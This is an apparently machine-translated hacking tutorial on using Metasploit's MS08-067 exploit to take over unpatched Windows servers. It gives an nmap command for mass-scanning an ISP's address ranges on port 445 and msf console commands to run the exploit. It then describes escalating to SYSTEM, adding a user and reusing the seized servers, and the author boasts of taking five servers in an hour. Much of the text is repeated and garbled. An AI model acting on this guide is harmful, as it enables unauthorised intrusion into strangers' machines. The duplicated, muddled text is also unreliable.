In this lecture, I will show you a method of extracting a remote Dedicated Server under Windows using Metasploit Framework using the MS08-067 vulnerability. For some reason, the exploitation of this bug is currently very popular among hackers, as evidenced by numerous posts and discussions on Facebook, although VKontakte pages dedicated to the same MSF are completely silent. In most cases, all systems running Windows XP Professional SP2 and SP3 are vulnerable (you can find a complete list of the operating systems at risk at kb.cert.org/vuls/id/827267). But in fact, all Microsoft software products can be compromised by exploiting this bug to this day.
Let's get down to work - download the latest release of the Metasploit Framework on the official website metasploit.com (or search on disk). Before installing it on the computer, disable the antivirus. The Metasploit Framework includes its own network port scanner, although we can also use the external nmap scanner to find networked Windows machines, which is also added to the distribution and installed along with the Metasploit Framework.
1. We launch the nmap scanner, marking port 445, since this is what we need for further exploitation of the server service vulnerability. And what exactly are we going to scan? The answer is quite simple - for example, you can take and scan the IP prefixes of your provider, which we can easily find on the bgp.he.net website in the "Prefixes IP v4" section.
To use the obtained prefixes in the nmap scanner, you must first copy them to a file - for example, my_isp.txt, and place the file in the working directory with nmap.
2. The command to start the scanner will look like this:
Great, as a result of the scan we got a list of hosts with the server service running, which can be seen from the external network, and it is not covered by anything, although Microsoft strongly recommended blocking access to this service from the Internet back in 2008 ... Interestingly, for each host, nmap issues detailed information about the type of installed OS.
Shell types: meterpreter payload and others
It is currently believed that a fully functional Meterpreter (MP) exists only for Windows, but in reality this is not entirely true. There are several more versions of MP implemented in PHP and JAVA. However, you yourself can become the author of a "payload" - for example, compile a TCL shell-code script for Cisco IOS using the tclpro.exe utility and then use it for cruel games with iron cats.
The standard MP payload can be used with almost all Windows exploits included in the Metasploit Framework by choosing one of the following payloads:
I will briefly explain the essence of each.
1. bind_meterpreter - reserves a port on the target machine and listens for connections. After the connection is established, the Meterpreter is downloaded to the target host, the current connection continues to be used to communicate with the remote machine.
2. reverse_meterpreter - itself connects to a predefined host on the specified port for further downloading the Meterpreter. The established connection is then used to communicate with the remote machine. Everything is fine, but for the successful implementation of this method, we need a real IP address (or set the forwarding of the ports you need through NAT).
2. find_tag — searches for a descriptor of the service processed by the exploit and uses it to download the Meterpreter to the remote machine, after which the existing connection will be used to communicate with it. This kind of payload is especially interesting because it does not require opening a new connection — thus, it is possible to bypass almost any firewall configuration.
4. bind_tcp - normal command interpreter like cmd.exe, of course, without any additional bells and whistles, like in Meterpreter. It just reserves a port on the target machine and loads the standard shell.
If a vulnerability exists on the remote machine, then we will gain access to the shell (cmd.exe) of this computer, and a message will appear in the window stating that the session has been successfully established. In the case when msf has identified the OS as Windows 7, you can try using the 64-bit payloads that are available in the corresponding section (we search through the GUI menu), or call the load through the console.
Server hijacking
Now, from the list of hosts generated by nmap, select an IP address running Windows 2003 Server - this will be our desired goal (after all, you, as a real network guru, should have your own Dedicated Server at least once in your life!). To work with the server, we will use the same exploit (exploit / windows / smb / ms08_067_netapi) and the bind_meterpreter payload. As a result, we gain access to the command shell through Meterpreter, after which we add a new user using the token_adduser script, having previously raised our privileges on the remote machine to the SYSTEM level using the use priv command. Well, we have a Dedicated Server that you can connect to using a remote desktop. On it we can install a proxy server, FTP and much more. During the experiment, I managed to get five Dedicated files in about an hour. I think it's cool!
Conclusion
If someone just wants to click on the "exploit" button so that Metasploit immediately produces ready-made Dedicated Devices, then I'll say right away - this will not happen: the method still takes time and patience.
An attack from a local network will most likely result in the system being completely compromised. In spite of everything, there is still a fairly wide field for experimenting with Windows security, and you can contribute to this cause.
Let's get down to work - download the latest release of the Metasploit Framework on the official website metasploit.com (or search on disk). Before installing it on the computer, disable the antivirus. The Metasploit Framework includes its own network port scanner, although we can also use the external nmap scanner to find networked Windows machines, which is also added to the distribution and installed along with the Metasploit Framework.
1. We launch the nmap scanner, marking port 445, since this is what we need for further exploitation of the server service vulnerability. And what exactly are we going to scan? The answer is quite simple - for example, you can take and scan the IP prefixes of your provider, which we can easily find on the bgp.he.net website in the "Prefixes IP v4" section.
To use the obtained prefixes in the nmap scanner, you must first copy them to a file - for example, my_isp.txt, and place the file in the working directory with nmap.
2. The command to start the scanner will look like this:
Code:
nmap -T4 -A -v -PE -PS445 -PA445 -iL my_isp.txtGreat, as a result of the scan we got a list of hosts with the server service running, which can be seen from the external network, and it is not covered by anything, although Microsoft strongly recommended blocking access to this service from the Internet back in 2008 ... Interestingly, for each host, nmap issues detailed information about the type of installed OS.
Shell types: meterpreter payload and others
It is currently believed that a fully functional Meterpreter (MP) exists only for Windows, but in reality this is not entirely true. There are several more versions of MP implemented in PHP and JAVA. However, you yourself can become the author of a "payload" - for example, compile a TCL shell-code script for Cisco IOS using the tclpro.exe utility and then use it for cruel games with iron cats.
The standard MP payload can be used with almost all Windows exploits included in the Metasploit Framework by choosing one of the following payloads:
I will briefly explain the essence of each.
1. bind_meterpreter - reserves a port on the target machine and listens for connections. After the connection is established, the Meterpreter is downloaded to the target host, the current connection continues to be used to communicate with the remote machine.
2. reverse_meterpreter - itself connects to a predefined host on the specified port for further downloading the Meterpreter. The established connection is then used to communicate with the remote machine. Everything is fine, but for the successful implementation of this method, we need a real IP address (or set the forwarding of the ports you need through NAT).
2. find_tag — searches for a descriptor of the service processed by the exploit and uses it to download the Meterpreter to the remote machine, after which the existing connection will be used to communicate with it. This kind of payload is especially interesting because it does not require opening a new connection — thus, it is possible to bypass almost any firewall configuration.
4. bind_tcp - normal command interpreter like cmd.exe, of course, without any additional bells and whistles, like in Meterpreter. It just reserves a port on the target machine and loads the standard shell.
Code:
msf> use exploit / windows / smb / ms08_067_netapi
msf exploit> set PAYLOAD windows / vncinject / bind_tcp
PAYLOAD => windows / vncinject / bind_tcp
msf exploit (ms08_067_netapi)> set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit (ms08_067_netapi)> exploitIf a vulnerability exists on the remote machine, then we will gain access to the shell (cmd.exe) of this computer, and a message will appear in the window stating that the session has been successfully established. In the case when msf has identified the OS as Windows 7, you can try using the 64-bit payloads that are available in the corresponding section (we search through the GUI menu), or call the load through the console.
Server hijacking
Now, from the list of hosts generated by nmap, select an IP address running Windows 2003 Server - this will be our desired goal (after all, you, as a real network guru, should have your own Dedicated Server at least once in your life!). To work with the server, we will use the same exploit (exploit / windows / smb / ms08_067_netapi) and the bind_meterpreter payload. As a result, we gain access to the command shell through Meterpreter, after which we add a new user using the token_adduser script, having previously raised our privileges on the remote machine to the SYSTEM level using the use priv command. Well, we have a Dedicated Server that you can connect to using a remote desktop. On it we can install a proxy server, FTP and much more. During the experiment, I managed to get five Dedicated files in about an hour. I think it's cool!
Conclusion
If someone just wants to click on the "exploit" button so that Metasploit immediately produces ready-made Dedicated Devices, then I'll say right away - this will not happen: the method still takes time and patience.
An attack from a local network will most likely result in the system being completely compromised. In spite of everything, there is still a fairly wide field for experimenting with Windows security, and you can contribute to this cause.
